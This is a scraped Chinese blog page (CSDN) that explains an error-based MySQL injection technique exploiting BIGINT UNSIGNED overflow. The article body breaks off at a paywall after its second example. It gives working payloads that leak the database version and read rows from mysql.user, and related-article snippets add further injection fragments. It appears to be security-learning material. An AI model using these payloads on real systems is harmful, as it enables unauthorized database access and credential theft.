新型mysql报错注入

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量1.1k 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoshan812613234/article/details/38516723
版权
本文探讨了一种新型的MySQL报错注入问题,特别指出该问题仅存在于MySQL 5.5版本中。通过利用BIGINT UNSIGNED范围错误,可以获取数据库中的信息。错误信息的长度限制是关键因素,允许攻击者通过调整LIMIT参数来定位不同行的数据。示例查询展示了如何构造报错注入语句,以揭示特定行的数据,如用户、主机和密码等敏感信息。
摘要由CSDN通过智能技术生成
新型mysql报错注入,这种报错注入主要是基于mysql中无符号int数据类型的溢出:
1.查询数据库版本:
select 2*(if((select 8 from (select (version()))s),18446744073709551610, 18446744073709551610));=select 1E308*if((select * from (select version())x),2,2)或者=select if(x,2,2)*1E308 from(select version()x)y

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if (( Select ' 5.5 from Dual), 18446744073709551610.1844674407370955 1610))' 1610))'


2.获取字段名称:

select 2*if((select * from (select * from test.shop)as a limit 1)>(select * from test.shop limit 1),18446744073709551610, 18446744073709551610);=select 1E308*if((select * from(select * from mysql.user) a limit 1)>(select *from mysql.user limit 1),2,2)

最低0.47元/天 解锁文章
shawnsec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SQL注入学习]针对union盲注的一次实验
Y4tacker的博客
10-20 2万+
前言:实验复现思路来自安全先师,感谢师傅的思路 文章目录利用方式如何利用 利用方式 case when 15 like '1%' then 0 else 2*1e308 end 当把输入参数当中的()替换为[]时,函数无法执行,可以看下面两张测试截图 如何利用 这里php本地环境出问题了就直接在navicat 里面演示,注意str4下面的值,首先在information_schema.SCHEMATA表当中查询第一个数据库名为information_schema 当错误时显示2 正确时显示3
新型mysql报错注入_新型mysql报错注入
weixin_30311521的博客
02-12 90
select 1E308*if((select*from(select version())x),2,2)SELECT (i IS NOT NULL) – -9223372036854775808 FROM (SELECT (version())i)aselect if(x,2,2)*1E308 from(select version()x)y获取字段名称SELECT 2 * if((SELECT...
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 1052
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
MySQL常见十种报错注入
weixin_52501704的博客
09-28 4065
MySQL常见十种报错注入
MySQL报错注入
yuan_boss的博客
08-23 2178
触发报错的方式有很多,具体细节也不尽相同。注意:通过concat()函数拼接的字符串长度只有31位,所以需要借助substr对结果进行截取,然后通过替换截取的下标来获取所有信息。领取地址:链接:https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?cms靶场中具有sql注入的地址:http://localhost/cms/cms/show.php?​ 在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。
MYSQL报错注入
聚鼎安全
01-08 3286
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
Mysql报错注入详解.docx
11-20
以下是对MySQL报错注入的详细解释: ### 前言 在某些情况下,常规的SQL注入方法,如UNION查询,可能无法用于获取数据,因为数据源不受用户输入控制。但当输入特定字符,如单引号,导致系统报错并显示信息时,报错...
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在攻击者能够通过输入特定的数据,导致应用程序返回关于其内部结构或数据库状态的错误信息。这种错误信息可以揭示敏感信息,如数据库名称、表名、列名,甚至数据本身,从而为攻击...
.NET Core 编程指南中文版 —— 4 .NET Core 3.0(预览版 2)的新增功能
uddiqpl的专栏
02-16 3926
.NET Core 3.0(预览版 2)的新增功能 本文介绍 .NET Core 3.0(预览版 2)的新增功能。最大的增强功能之一是对 Windows 桌面应用程序(仅限 Windows)的支持。通过利用名为“Windows 桌面”的 .NET Core 3.0 SDK 组件,可以移植 Windows 窗体和 Windows Presentation Foundation (WPF) 应用...
详细解读mysql十二种报错注入
weixin_45778886的博客
11-06 440
使用条件 查询不回显内容,会打印错误信息 报错原理 报错型注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果 mysql语句的特性–子查询 在这里虽然语句b有错误,但是由于语句a没有错误所以成功查询出变量A,随后变量A与语句b构成新的语句,又由于语句b存在错误,所以报错时连带着变量
sql注入(报错注入
2401_82760239的博客
04-02 1384
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2201
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
怎么调取cstring left函数_Go语言函数深度解析(上)
weixin_39605414的博客
11-22 200
基本原理函数,几乎是每种编程语言的必备语法,通过函数把一系列的动作汇总起来,在不同的地方重复使用。我们在数学中曾经就使用过函数,他的形式类似于y=f(x),这就是一个完整的调用过程,y就是函数计算后得到的值,x就是传入的变量。怎么用?相信在看这个教程的人肯定已经接触过其他的编程语言,我就不多废话了,就是干。go语言中最基本的函数是这样的,以func为关键字标记函数funcfunctionPara...
《网络安全自学教程》- SQL注入之报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 2495
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
mysql报错注入updatexml原理
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值